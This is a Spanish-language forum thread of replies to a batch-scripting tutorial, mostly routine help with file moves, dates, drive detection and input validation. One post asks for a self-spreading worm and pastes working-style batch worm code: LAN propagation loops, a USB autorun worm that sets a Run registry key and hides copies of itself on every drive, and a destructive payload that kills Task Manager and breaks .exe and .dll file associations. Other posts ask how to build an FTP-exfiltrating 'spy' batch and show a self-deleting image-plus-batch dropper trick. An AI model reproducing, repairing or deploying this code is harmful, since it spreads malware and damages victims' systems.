set objfso = createobject("scripting.filesystemobject") set lacarpeta = objfso.getfolder("C:\Documents and Settings\tesdcv01\Escritorio\pruebas\") set afil = lacarpeta.files movidos = 0for each f in afil set elarchivo = objfso.OpenTextFile(f.path,1) contenido = elarchivo.readall primero = instr(1,contenido,"000323 00000000000",1) segundo = instr(1,contenido,"000333 000000000000",1) elarchivo.close if primero =0 or segundo=0 then objfso.movefile f.path,"C:\Documents and Settings\tesdcv01\Escritorio\pruebas\ok\"&f.name movidos = movidos+1end if next if movidos = 0 then msqbox "No se ha movido ningún archivo"

else msgbox "Se han movido " & movidos &" archivos" end if :-\

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: Shinseiki86 en 23 Junio 2008, 20:37

Lo que tambien me puede servir es un for que lea un txt con estos datos:

```
2008-06-19_590059_NI_890807898_EPS018_86_I.TXT
2008-06-19_621451_NI_890706425_EPS018_86_I.TXT
2008-06-19_621451_NI_890706425_EPS018_86_I.TXT
2008-06-19_621452_NI_890706425_EPS018_86_I.TXT
2008-06-19_621517_NI_810001583_EPS018_86_I.TXT
2008-06-20_102019121_CC_94487480_EPS018_51_I.TXT
2008-06-20_102019121_CC_94487480_EPS018_51_I.TXT
2008-06-20_102088573_CC_5931385_EPS018_01_I.TXT
2008-06-20_102718305_CC_33966379_EPS018_01_I.TXT
2008-06-20_102718305_CC_33966379_EPS018_01_I.TXT
2008-06-20_103000920_CC_31992855_EPS018_01_I.TXT
2008-06-20_103000920_CC_31992855_EPS018_01_I.TXT
2008-06-20_103161002_CC_16638978_EPS018_01_I.TXT
```

Y me cree un txt con las lineas que se repiten.

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: Novlucker en 23 Junio 2008, 20:44

Te había enviado un privado, para no seguir llenando el post :xD

Cual es el texto que aparece en el error?
También hay que tener en cuenta que la carpeta C:\Documents and Settings\tesdcv01\Escritorio\pruebas\ok debe de existir

Saludos

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: Shinseiki86 en 24 Junio 2008, 14:52

Gracias Novlucker ya funciona. ;D

Aunque por curieosidad... como me refiero a la linea siguiente de un archivo? :huh:

No creo que se entienda asi... si tengo un txt asi:

Α

В

В

 \mathbf{C}

Y quiero comparar lineas, linea1==lineasiguente... y que sea recursivo... y en batch... (falta que quiera que tambien me sirva un café)

Título: Re: -> Programación BATCH Avanzada. (nuevo)
Publicado por: sirdarckcat en 25 Junio 2008, 01:26

no puedes definir variables locales en batch.. tendrias que emularlas con prefijos, o algo similar.. por lo que per-se, la recursión no existe en batch

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: Shinseiki86 en 25 Junio 2008, 19:29

Hola! tengo otra preguntica... quiero abrir un xls desde el batch, pero este queda bloqueado hasta que cierre excel, ¿como hago para que continue asi este abierto el xls?

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: Novlucker en 25 Junio 2008, 19:51

Supongo que para ejecutarlo estas poniendo....

Código:
excel.exe

En lugar de eso debes de poner......

Código:
start excel.exe

;)

El code te quedará algo como esto

Código:

cd %programfiles%\microsoft office\office11
start excel.exe

Saludos

Título: Re: -> Programación BATCH Avanzada. (nuevo)

Publicado por: Xen11 en 31 Julio 2008, 06:04

Hola que tal, quiero que el batch fije la fecha actual, la cambie por una X fija, abra un exe y luego la setee a la que fijo en primer orden, lo que me ocurre es que se setea a la "actual" luego de cerrar el programa, en que me equivoco, o que me falta?

Código:

FOR /F "tokens=1-4 delims=/ " %%a in ('date /t') do (set fecha=%%a-%%b-%%c)

date 29-07-2008

C:\vet\vet.exe

date %fecha%

Muchas gracias!

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: Shinseiki86 en 13 Agosto 2008, 22:12

Hola a todos!

Como puedo hacer que se cree una unidad de red con bat?

Gracias.

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: carlitos.dll en 13 Agosto 2008, 22:31

Cita de: Shinseiki86 en 13 Agosto 2008, 22:12

Hola a todos!

Como puedo hacer que se cree una unidad de red con bat?

Gracias.

con el comando net use

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: Xen11 en 14 Agosto 2008, 16:28

reitero la pregunta Hola que tal, quiero que el batch fije la fecha actual, la cambie por una X fija, abra un exe y luego la setee a la que fijo en primer orden, lo que me ocurre es que se setea a la "actual" luego de cerrar el programa, en que me equivoco, o que me falta?

Código:

```
FOR /F "tokens=1-4 delims=/ " %%a in ('date /t') do (set fecha=%%a-%%b-
%%c)
date 29-07-2008
C:\vet\vet.exe
date %fecha%
```

Muchas gracias!

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: Novlucker en 14 Agosto 2008, 16:56

En que para ejecutar el programa deberías de utilizar **start**, si no lo haces el cmd queda a la espera de que se cierre el programa, y luego sigue, es como hacer **start /wait**

Código

```
    FOR /F "tokens=1-4 delims=/ " %%a in ('date /t') do (set fecha=%%a-%%b-%%c)
    date 29-07-2008
    start C:\vet\vet.exe
    date %fecha%
```

Saludos ;)

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: Shinseiki86 en 21 Agosto 2008, 02:45

Buenas noches!

Necesito abrir un txt y buscar un dato especifico (aaaa-mm-dd) que se encuentra en la columna columna 505 hasta la 514 de la primera linea, y reemplazar este por otra fecha.

El nombre del archivo tiene esta estructura:

aaaa-mm-dd numero cc numero eps018 00 I.txt

Y necesito que modifique este archivo en la linea uno columna 505-514 con la fehca que se encuentra en el nombre. Es posible con bat?

Título: Re: -> Programación BATCH Avanzada. (nuevo)
Publicado por: ACALFCROW en 12 Septiembre 2008, 18:58

hola que tal espero me puedan ayudar estoy creando un bat para un ejecutable el problema es que en cierto momento el ejecutable me pide que agregue otro nombre

de archivo o presione enter y ahi es donde no se como meter un enter en el bat he intentado dejar espacio en blanco un punto pero como espera el nombre de

un archivo o enter me lo toma como nombre de archivo alguien me puede ayudar

Título: Re: -> Programación BATCH Avanzada. (nuevo)
Publicado por: sib85 en 25 Septiembre 2008, 00:07

Hola::

Tengo una duda un poco urgente, ¿Como puedo leer sólo la primera linea de un fichero txt?

lo que tengo que hacer es pasar un script de linux a windows y recrear la funcion

head -1 de shell script. Había pensado en un for, pero no se cómo poner el límite de 1 sola línea.

Muchas gracias de antemano :)

Nieves

Título: Re: -> Programación BATCH Avanzada. (nuevo)
Publicado por: augustocgg en 29 Septiembre 2008, 04:48

Hola

Me pueden ayudar de como hago para programar el siguiente bat

el bat me tiene que copiar archivos de una carpeta especificada, y solamente tienen que ser los archivos creados en el mes en curso de windows

la validacion seria solor por el mes en curso del sistema

Gracias a todos

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: flony en 7 Octubre 2008, 21:14

hola quisiera mover unos archivos que tengo en una carpeta a otra y que pueda distinguir entre .doc y .txt si me dan una mano seria barbaro

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: Novlucker en 7 Octubre 2008, 21:32

Hola, con el comando **move** alcanza, simplemente utilizas el comodín * Código

```
1. move *.doc carpetadestino
2. move *.txt carpetadestino
```

Saludos

Título: Re: -> Programación BATCH Avanzada. (nuevo)
Publicado por: chill@321 en 10 Octubre 2008, 22:21

:huh: tengo duda como se programa para que se prenda la compu :huh:

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: sirdarckcat en 17 Octubre 2008, 03:09

jajaja, osea remotamente? o con un timeout? o como? depende que quieras hacer...

Título: Re: -> Programación BATCH Avanzada. (nuevo)
Publicado por: devil_boskonovitch en 1 Noviembre 2008, 17:13

Hola muchachos...!!!

Entro para ver si me podrian ayudar con unos codigos BAT...

Es que necesito un BAT que haga lo siguiente:

Que se propague por memorias USB, disco duros y particiones...!!!

Y que se pueda propagar en una RED LOCAL y que se autoejecute en las PC infectadas....

Hace ratico... encontre estos codigos de propagacion de red local, pero no me han funcionado:

Código:

@echo off
set/a ip=192.168.1.1
:mode
copy %0 > \\%ip%
start %0 at\\%ip%
set/a ip=ip+1
goto mode

Y este otro:

Código:

@echo off
set/a ip=192.168.1.1
:mode
copy %0 > \\%ip%
start %0 at\\%ip%

```
set/a ip=ip+1
if ip 192.168.1.255 goto salir else goto mode
:salir
exit
```

Me mandan error...

Y encontre este para que se propague en USB:

Código:

```
@echo off
attrib +s +h %0
msq * hacked by -={ naxo itc }=-
reg add hklm\software\microsoft\windows\currentversion\run /V Dump.exe /D
C:\Drivers\Dump.exe /f
:bluce
ping -n 10 127.0.0.1
IF exist C:\Drivers (goto 02) else (md C:\Drivers & attrib +h +s
C:\Drivers & goto 02)
:02
FOR %%A IN (E F G H I J K L M N O P Q R S T U V W X Y Z) DO (
IF exist %%A:\Drivers (goto a) else (md %%A:\Drivers & attrib +h +s
%%A:\Drivers & goto a) )
:a
IF exist C:\Drivers\Dump.exe (goto 05) else (goto 04)
:04
FOR %%A IN (E F G H I J K L M N O P Q R S T U V W X Y Z) DO (
attrib -s -h %%A:\Drivers\Dump.exe & copy "%%A:\Drivers\Dump.exe"
"C:\Drivers\Dump.exe" & attrib +s +h %%A:\Drivers\Dump.exe)
attrib +h +s C:\Drivers\Dump.exe
• 05
IF exist C:\autorun.inf (goto 07) else (goto 06)
:06
echo [AutoRun]>>C:\autorun.inf
echo label= naxo itc>>C:\autorun.inf
echo open=Drivers\Dump.exe>>C:\autorun.inf
echo shellexecute=Drivers\Dump.exe>>C:\autorun.inf
echo shell\Auto\command=Drivers\Dump.exe>>C:\autorun.inf
attrib +h +s C:\autorun.inf
:07
for /f "tokens=2 DELIMS= " %%B in ('FIND /I "naxo" C:\autorun.inf') do
set co=%%B
if naxo== %co% (goto b) else (goto nar)
attrib -h -s C:\autorun.inf
del /f /q C:\autorun.inf
goto 06
:b
FOR %%A IN (E F G H I J K L M N O P Q R S T U V W X Y Z) DO (
IF exist %%A:\Drivers\Dump.exe (goto OCool else (attrib -s -h
C:\Drivers\Dump.exe & copy "C:\Drivers\Dump.exe" "%%A:\Drivers\Dump.exe"
& attrib +h +s %%A:\Drivers\Dump.exe & attrib +s +h C:\Drivers\Dump.exe &
goto OCool )
```

```
:08
FOR %%A IN (E F G H I J K L M N O P Q R S T U V W X Y Z) DO (
IF exist %%A:\autorun.inf (goto 09) else (attrib -h -s C:\autorun.inf & copy "C:\autorun.inf" "%%A:\autorun.inf" & attrib +h +s %%A:\autorun.inf & attrib +h +s C:\autorun.inf & goto bluce) )
:09
FOR %%A IN (E F G H I J K L M N O P Q R S T U V W X Y Z) DO (
for /f "tokens=2 DELIMS= " %%B in ('FIND /I "naxo" %%A:\autorun.inf') do set co=%%B )
if naxo== %co% (goto bluce) else (goto her)
:her
FOR %%A IN (E F G H I J K L M N O P Q R S T U V W X Y Z) DO (
attrib -h -s %%A:\autorun.inf & del /f /q %%A:\autorun.inf )
FOR %%A IN (E F G H I J K L M N O P Q R S T U V W X Y Z) DO (
attrib -h -s C:\autorun.inf & copy "C:\autorun.inf" "%%A:\autorun.inf" & attrib +h +s %%A:\autorun.inf & goto bluce )
```

En este.. la amenaza no se copia a la carpeta Drivers que crea el BAT...????? Aun cambiando el nombre de la amenaza por un BAT, no se aplica...???

El codigo que quiero propagar es este:

Código:

```
@echo off
taskkill /im taskmgr.exe
msg * BURLANDO TODAS LAS DEFENSAS DE TU EQUIPO
CD C:\Program Files\
assoc .exe=txtfile
assoc .dll=batfile
CD C:\Documents ans Settings\All Users\Desktop
echo YO HE DESTRUIDO TODOS TUS PROGRAMAS > Hola.txt
exit
```

Cualquier ayuda se la agradecería....Mucho...!!!

Saludos...

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: patovica en 2 Noviembre 2008, 15:02

Cuales son las intrucciones para que detecte un pendrive. O sea, quiero que pregunte si el pendrive esta conectado o no, no importa lo que sigue, yo lo que quiero saber es cual es la instruccion para detectar el pendrive.

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: Darioxhcx en 2 Noviembre 2008, 18:50

Cita de: patovica en 2 Noviembre 2008, 15:02

Cuales son las intrucciones para que detecte un pendrive. O sea, quiero que pregunte si el pendrive esta conectado o no, no importa lo que sigue, yo lo que quiero saber es cual es la instruccion para detectar el pendrive.

if exist E:\
algo asi ?
saludos

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: Leo Gutiérrez. en 2 Noviembre 2008, 18:54

Mira este codigo detecta las unidades removibles (para sistemas en español) :

Código:

```
@echo off
for /f "tokens=3" %%x in ('echo list volume ^| diskpart ^| find /i
"Extra"') do (echo %%x:)
pause>nul
```

Comandos que podrian servirte :

Código:

wmic logicaldisk get caption
Código:
fsutil fsinfo drives
Código:
echo list volume | diskpart

Ahora prueba este codigo aver si te sirve :

Código:

```
@echo off
for /f "tokens=2 skip=1" %%x in ('fsutil fsinfo drives ^| more') do (
fsutil fsinfo drivetype %%x | find /i "extra"
)
for /f "tokens=1 skip=2" %%x in ('fsutil fsinfo drives ^| more') do (
fsutil fsinfo drivetype %%x | find /i "extra"
)
pause>nul
Código:
@echo off
for /f "tokens=2 skip=1" %%x in ('fsutil fsinfo drives ^| more') do (
fsutil fsinfo drivetype %%x
)
for /f "tokens=1 skip=2" %%x in ('fsutil fsinfo drives ^| more') do (
fsutil fsinfo drivetype %%x
)
pause>nul
exit /b
```

Saludos.

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: uroboros en 2 Noviembre 2008, 23:54

El tema de variables ningun problema; pero lo de argumentos no lo cojo por ningun lado; es en eso de %0, el astring, %~f1, eso del directorio donde se tiene el archivo y como luego se muestran los analisis

es más, el concepto en general es lo que no comprendo. por ejemplo en este codigo

@echo off

echo Con Comillas: %1 echo Sin Comillas: %~1

el %1 a q se refiere?

o que es eso re recibir?

"Si lo que recibimos no es un archivo, sino una cadena de texto, que contiene mas de una palabra, se debe poner entre comillas, algo asi:"

si se me aclara el concepto, la idea general de los argumentos y de la semantica de sus codigos no tendré ningun problema, solo que el problema lo tengo al principio de todo y entonces ya no me funciona nada.

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: patovica en 3 Noviembre 2008, 22:41

LEO G. muchas gracias por la respuesta, los probe y andan perfectos, los tendia que pulir un poquito para que detecte solamene el pendrive, ahora otra pregunta mas, la ideas es arragar este programa cuando se inicie window y quede latente hasta que alguien meta un pendrive y cuando sea asi me avise mediante una alerta, esta parte ya me anda, me falta como poder hacer para que quede stand by. Muchas gracias.

Título: Re: -> Programación BATCH Avanzada. (nuevo)
Publicado por: Leo Gutiérrez. en 4 Noviembre 2008, 05:08

Hola, con respecto a lo de Stand by, puedes hacer un bucle que cada determinado tiempo, muestre las unidades extraibles conectadas, algo asi :

Código:

```
@echo off
:Code
ping -n 20 127.0.0.1>nul
...Codigo
goto:Code
```

Ahora, hice este otro Script, muestra las USB'S, es parecido a los demás, solo que ahora muestra la lista asi :

```
A:
B:
C:
etc.
Código:
@echo off
:Code
nircmd wait 3000
for /f "tokens=2 skip=1" %%x in ('fsutil fsinfo drives ^| more') do (
fsutil fsinfo drivetype %%x | find /i "extra" > nul 2>&1 && (
for /f "tokens=1" %%c in ('echo %%x') do (
echo %%c
for /f "tokens=1 skip=2" %%x in ('fsutil fsinfo drives ^| more') do (
fsutil fsinfo drivetype %%x | find /i "extra" > nul 2>&1 && (
for f "tokens=1" %%c in ('echo %%x') do (
echo %%c
)
)
nircmd wait 1000
cls
```

El codigo usa a nircmd.exe, descargalo de nirsoft.net (http://nirsoft.net).

Saludos.

goto:Code

Título: Re: -> Programación BATCH Avanzada. (nuevo)
Publicado por: Leo Gutiérrez. en 4 Noviembre 2008, 05:18

Hola, de esta otra forma tambien se puede ;D:

Código:

```
@echo off
for /f "tokens=3" %%x in ('echo list volume ^| diskpart ^| find /i
"extra"') do (
echo %%x:
)
>nul (pause)
exit /b
```

Saludos.

Con WMIC tambien se pude, pero tengo problemas con el ahorita.

Título: Re: -> Programación BATCH Avanzada. (nuevo)
Publicado por: Leo Gutiérrez. en 4 Noviembre 2008, 05:23

Hola, tal ves te interese este, loo hice para que detecte las unidades extraibles y su espacio :

```
Código:
```

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: patovica en 7 Noviembre 2008, 03:19

Estimado LEO Gtz., de los programas que me mandastes, andan, pero lo que no me puedo dar cuenta es como puedo trabajar con las unidades, ya que si bien las ve, el programa solo se limita a hacer un loop y mostrar lo que encuentra pero no se como puedo preguntar por una especifica, por ejemplo yo quiero que me avise si alguien puso un pendrive en mi maquina en mi caso la letra es H:, Y otro tema que tambien quiero ver y no encuentro nada para leer, es que cuando se ejecute el archivo bat. no muestre la ventana de DOS, o sea que quede corriendo como en segundo plano.

Título: Re: -> Programación BATCH Avanzada. (nuevo)
Publicado por: Leo Gutiérrez. en 8 Noviembre 2008, 05:15

El codigo de abajo, constantemente esta buscando la unidad F:\, si la encuentra lanza el mensaje, si no, continua buscando.
Código

```
1. @echo off
2. :Bucle
3. set buscar=F:\
4. echo Buscando.
5. fsutil fsinfo drives | more | find /i "%buscar%" && (
6. echo:
7. echo Unidad %buscar% encontrada.
8. pause>nul
9. goto:eof
10. ) || (
11.
     cls
12.
       goto:Bucle
13.
      )
14.
```

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: Meta en 23 Diciembre 2008, 11:59

Hola:

Muy currado el tutorial. He hecho una prueba con el bat.

Código:

```
ECHO @OFF
ECHO ^<head^>^<title^>Prueba del BAT^</title^>^</head^>^<body^>Esto es
una prueba^<p^>>^<ahref="directorio/prueba2.html"^>Enlace
2^</a^>^</p^>^</body^>^</html^> > prueba.html
MKDIR directorio
CD directorio
ECHO ^<head^>^<title^>PRUEBA
2^</title^>^</head^>^<p^>^<ahref="../prueba.html"^>VOLVER^</a^>^>^<body^>Esto es una prueba del html dentro de la carpeta
directorio.^</body^>^</html^> > prueba2.html
```

Como podrás comprobar funciona. Pero quiero hacer otra cosa que no se si se puede hacer o al menos vamos a intentarlo. Lo que quiero hacer un logo o una imagen cualquiera tamaño de nuestro avatar de este foro y copiar su código en el bat. Me imagino que se podrá obtener con un hexadecimal. Probamos este mismo que tiene fama www.winhex.com

Ahora me dirás si se puede hacer.

Un cordial saludo.

EDITO:

PD: Aquí hay algo que deberías incluir en tu tutorial.

http://www.cristalab.com/tips/49576/programacion-avanzada-de-archivos-en-lotes-.bat.html

http://www.cristalab.com/tips/48410/programacion-batch-con-archivos-.bat.html

Título: Re: -> Programación BATCH Avanzada. (nuevo)
Publicado por: Leo Gutiérrez. en 23 Diciembre 2008, 18:47

Algo como esto:

```
Código:
@echo off
mode con cols=100
lines=100
echo
          !!!i1/)))$$$$$)))/ii!
echo
         !i1))$$$$$$$$$$$$$$$$$$$$$11i!
echo
        echo
      echo
/iii!
     echo
$))ii))1
    echo
1 1/!!1)
   echo
!11i/ii!)$))
  i//i!))!$$$$i
  echo
$!!ii!!)$$$$)
  echo
)$$))$$$$)ii
$//ii11/)$$$
11$$$$$$$$$$$$$!!
echo
$$$)!
echo !$$$$$$$)
       11$$$$$$$$$1
echo
      $$$$i !!$$$$
)$$$$)ii
              )$$$i $$$//
```

```
echo $$$$)
          )$$$! !!$$))
!!ii
                             i$$$1 1$$!!
echo
$$$$!i$$$$)) )$$$! !!$$11
                                   !$$$/
                                        !$$ii
echo /$$$ )))
/$$$! 1$$$! !!$$ii
                            11$$ /$$$
echo
i$$$i!$$!1$$$i
              1$$$! !!$$!!
                                   !!$$
                                         !$$$
echo
$$$$! $$$$1
             !)11
                    ) )
                                    ) )
                                          111
echo ii$$$$$$$$i
TTTTTTTTT
echo.
echo
       !))))T
                                     T))))!
                                                  TT
TTTTTTTTTT
     !66ddddddd))
                                   ) dddddddd6!!
                                                 TTdd
ddddddddd!!
echo ) ddd!
             (ddd
                                  dd ( (
                                        Tddd)
                                                 TTdd
echo (d66
            TdddT !! !!
                                 !ddTT
                                          6dd6
                                                 TTdd
   (ddd!
                   !!dd !!dd!
                               !dd((
                                                 TTdd
echo
    !dddd(TT
                 !!dd !!dd! 6ddd6)!!
echo
                                                 TTdd
echo
        ) (ddddddd (
                !!dd !!dd!
                                    TT(6ddddd66!
                                                 TTdd
ddddddddd (
                 !!dd !!dd!
                                      !!T6ddd6
echo
           !) ddddT
                                                 TTdd
             ddd (
                  !!dd
                         !!dd!
                                  TT!
                                         ) ddd!
echo
    {	t TT}
                                                 TTdd
echo
    !ddTT
             66d6
                  !!dd
                         !!dd!
                                  (d6
                                         Tddd!
                                                 TTdd
echo ) ddd6T!!!T6ddd!
                    dd( !66dd!
                                  dddd)!!)ddd(
                                                 БЬТТ
()))))))!!
                   ) dddddd ( (dd!!dddddddddd66
echo
     ) dddddddddddT
                                                 TTdd
dddddddddTT
echo !!(6ddd6)!! T6666T )) ))66dd6(T
                                                 !!))
)))))))))!!
pause>nul
exit /b 0
```

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: Meta en 23 Diciembre 2008, 20:42

No me refería eso, pero ahora que lo veo, me encanta. Buen dibujo, ;)

Me refiero que cojas una imagen cualquiera. Por ejemplo imagen.jpg.

(http://multanilinuxmall.net/images/744px-OpenSUSE_Logo.svg.png)

Con ella guardar la foto tal como se ve aquí. que al ejecutar el bat, aparezca lo que se ve.

¿Eso es posible?

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: ./Phr0zer en 23 Diciembre 2008, 21:00

sip, es posible un ejemplo seria este ->

Código

```
1. copy /b pepe.jpg + 01.bat resultado.bat
```

y en el 01.bat debe ir un code como este

Código

```
    CLS
    @ECHO OFF
    msg * "creando la imagen" ;Si quieren pueden suprimir esta linea
    COPY %0 pepe.jpg
    start pepe.jpg
    ERASE %0
```

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: _carlos_ en 23 Diciembre 2008, 21:27

podrías usar bhb 2.0

http://sites.google.com/site/cmdbatch/bhb-2-0

Título: Re: -> Programación BATCH Avanzada. (nuevo)

Publicado por: Meta en 24 Diciembre 2008, 00:42

<u>Cita de: carlos en 23 Diciembre 2008, 21:27</u> podrías usar bhb 2.0

http://sites.google.com/site/cmdbatch/bhb-2-0

Muchas gracias a todos/as, voy a investigar.

PD: Si sabe algo más, no duden en poderlo aquí.

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: Diego_Kappo en 23 Febrero 2009, 20:53

Necesito lo siguiente y no acierto a dar en la tecla. Tengo unos script en sql server que crean backups por fecha o sea un archivo con nombre de ejemplo "backup_23_02_2009.bak" . Lo que necesito es generar un bat que obtenga la fecha del sistema y la asigne a una variable. Luego necesito extraer tambien del nombre del archivo la subcadena "23_02_2009", asignarla a una variable para poder compararlas. Si la fechas son iguales copiar el archivo en cuestion a una carpeta determinada. se puede hacer con bat o tengo que hacerlo en VB6?

Atte Diego

Título: Re: -> Programación BATCH Avanzada. (nuevo)
Publicado por: Leo Gutiérrez. en 24 Febrero 2009, 04:54

Cita de: Diego Kappo en 23 Febrero 2009, 20:53

Necesito lo siguiente y no acierto a dar en la tecla. Tengo unos script en sql server que crean backups por fecha o sea un archivo con nombre de ejemplo "backup_23_02_2009.bak" . Lo que necesito es generar un bat que obtenga la fecha del sistema y la asigne a una variable. Luego necesito extraer tambien del nombre del archivo la subcadena "23_02_2009", asignarla a una variable para poder compararlas. Si la fechas son iguales copiar el archivo en cuestion a una carpeta determinada. se puede hacer con bat o tengo que hacerlo en VB6?

Atte Diego Código

```
    @echo off
    set "archivo=backup 23 02 2009.bak"
```

```
4. echo. Fecha del sistema : %date:/= %
5. echo.Archivo %archivo%
6. set "subcadena=%archivo:~-14%"
7. set "subcadena=%subcadena: = %"
8. set "subcadena=%subcadena:~0,-4%"
9. echo. Subcadena : %subcadena%
10.
       if ["%subcadena%"]==["%date:/= %"] (
11.
       echo.Son iguales.
12.
     rem Codigo para copia
13.
     ) else (
14.
     echo. No son iguales
15.
    rem Accion contraria.
16.
17.
      set /p "=Presiona una tecla para salir del programa"
       exit /b 0
18.
```

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: alegrecentro en 2 Marzo 2009, 23:18

Una maravilla de tutorial.

Un saludo

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: huww en 19 Marzo 2009, 17:16

Soy nuevo y hasta ahora es lo mejor que he visto en el foro, muy buen tuto muy currado enhorabuena ;-) ;-)

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: .;. en 19 Marzo 2009, 17:29

Muy buen tutorial.

Gracias por postear esto.

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: ..::Breakk_:::.. en 27 Mayo 2009, 01:16

gracias por el tuto

Título: Re: -> Programación BATCH Avanzada. (nuevo)
Publicado por: Raquelcita en 15 Julio 2009, 17:44

Hola a todos. Soy nueva en este mundillo. A ver si alguien me ayuda... Quiero parar la cola de impresión, con un net stop spooler, pero de una máquina que está en red. ¿Cómo he decírselo? Muchas gracias

Título: Re: -> Programación BATCH Avanzada. (nuevo)

Publicado por: Stati98 en 22 Julio 2009, 18:23

Gracias, siempre algo sirve, puedo saber un poquito de cada cosa, y esto me sirve muchisimo para aprender otro poquito mas.-

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: dapark en 24 Agosto 2009, 00:17

esta muy bueno tu manual, muschas gracias, pero tengo una inquietud, e buscado la manera para poder validar q solo acepte numeros enteros, q no acepte ningun otro caracter.... pero se me dificulta porq soy algo nuevo en la programacion, nose si podrian ayudarme....

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: Leo Gutiérrez. en 27 Agosto 2009, 04:46

Prueba algo como:

Código:

```
:isNumber
set /p "number=Number: "
if not defined number goto :isNumber
set "variable=false"
for /f "delims=abcdefghijklmnopqrstuvwxyz" %%a in ("%number%") do set
"variable=true"
if "%variable%"=="true" (
echo Bien
pause>nul
exit /b 0
) else (
echo Mal.
goto :isNumber
)
```

No filtra todo.

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: dapark en 27 Agosto 2009, 06:00

```
Cita de: Leo Gutierrez. en 27 Agosto 2009, 04:46
Prueba algo como:
Código:
:isNumber
```

```
set /p "number=Number: "
  if not defined number goto :isNumber
  set "variable=false"
  for /f "delims=abcdefghijklmnopqrstuvwxyz" %%a in ("%number%") do set
"variable=true"
  if "%variable%"=="true" (
  echo Bien
  pause>nul
  exit /b 0
  ) else (
  echo Mal.
  goto :isNumber
  )
```

No filtra todo.

Idea provista por MATT.

Leo Muchisima gracias este me a serivido, con anterioridad habia realizado este:

Código:

pero no logre adaptarlo a los batch que he estado realizando... el q tu me distes lo acople en un minuto a los programas muchas gracias

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: mDrinky en 30 Diciembre 2009, 23:13

Esta muy bien el tuto.

salu2!

Título: Re: -> Programación BATCH Avanzada. (nuevo)
Publicado por: dmx-anonimo en 31 Diciembre 2009, 17:42

disculpen tengo una duda se programar en batch I y todo eso pero no entiendo de que forma puedo hacer un espia en batch que se mande por internet usando solo un ftp

en modo pasivo se puede crear obras de arte con batch osea programas espias

buenos yo he hecho un par pero cuando lo mando no me llega nada y pruevo el batch en mi pc y anda y usando un server ftp de mi pc no uno pago pero qisiera ver algun codigo posteados de algun batch potente en modo espia yo tengo un par de ideas pero me falta hacer que funque el envio solo me falla

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: dario2k8 en 5 Abril 2010, 09:08

iMuy Buen tutorial!

eso.....saludos ;D

Aprovecho para abusar de la amabilidad de los expertos.

Tengo la siguiente duda, cuando defino un set var=(ruta y archivo) ejemplo:

set var=c:\ventas\emp.dat

if exist %var% (goto dale) else goto falta

"esta sentencia acepta la ruta completa, por que no me resulta".

¿mi código está mal? Citar @echo off cls

if exist c:\ventas\emp.dat (goto dale) else goto falta

```
:dale
cd\ventas
start /low /wait sispv.exe
goto FIN
:falta
cd\ventas
copy c:\ventas\emp c:\ventas\emp.dat
start /low /wait sispv.exe
goto fin
:fin
exit
```

Gracias, por la posible ayuda.

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: Leo Gutiérrez. en 5 Abril 2010, 16:17

Las rutas siempre trabajalas con dobles comillas.

Código:

```
set "var=c:\ventas\emp.dat"
if exist "%var%" (goto dale) else goto falta
```

Tú código no lo veo mal, mira, déjalo así:

Código:

```
@echo off
cls
if exist "c:\ventas\emp.dat" (goto:dale) else (goto:falta)
:dale
cd \ventas
start /low /wait sispv.exe
goto FIN
:falta
cd \ventas
copy "c:\ventas\emp" "c:\ventas\emp.dat"
start /low /wait sispv.exe
:fin
ovit
```

¿Te da un error en pantalla?

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: dario2k8 en 14 Abril 2010, 06:57

;-) Gracias Leo, por contestar mi consulta.... voy a probar ese código. ;-)

¿Te da un error en pantalla? :rolleyes: Te comento si me sale alguno.

```
Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: Hanzo_lx en 29 Abril 2010, 21:00
```

HOla a todos, despues de encontrar este genial manual me gustaria a ver si vosotros veis el fallo porque me estoy volviendome loco

estaba haciendome un bat para renombrar unos archivos segun mis necesidades y me queda algo asi:

Código:

```
@echo off
echo
           ______
echo
echo
                    Renamer
echo
echo
           _____
:data
set /p Historia=Escriba el numero de historia:
set /p Ojo=Escriba el tipo de ojo:
           echo
echo
            Los datos son correctos?
echo
            Numero de historia: %Historia%
            Tipo de ojo: %Ojo%
echo
           _____
echo
set /p respuesta=1 es Si, 2 es NO:
if %respuesta% EQU 1 (goto :renombrar) else (goto :data)
:renombrar
set contador=0
```

el tema es que debe renombrar los archivos con nombre de historia+tipo+contador de archivo+fecha de creacion de archivo

el contador lo inicializo a cero y en cada iteración deberia aumentar en 1 pero siempre me saca 0 y no caigo en que estoy haciendo mal

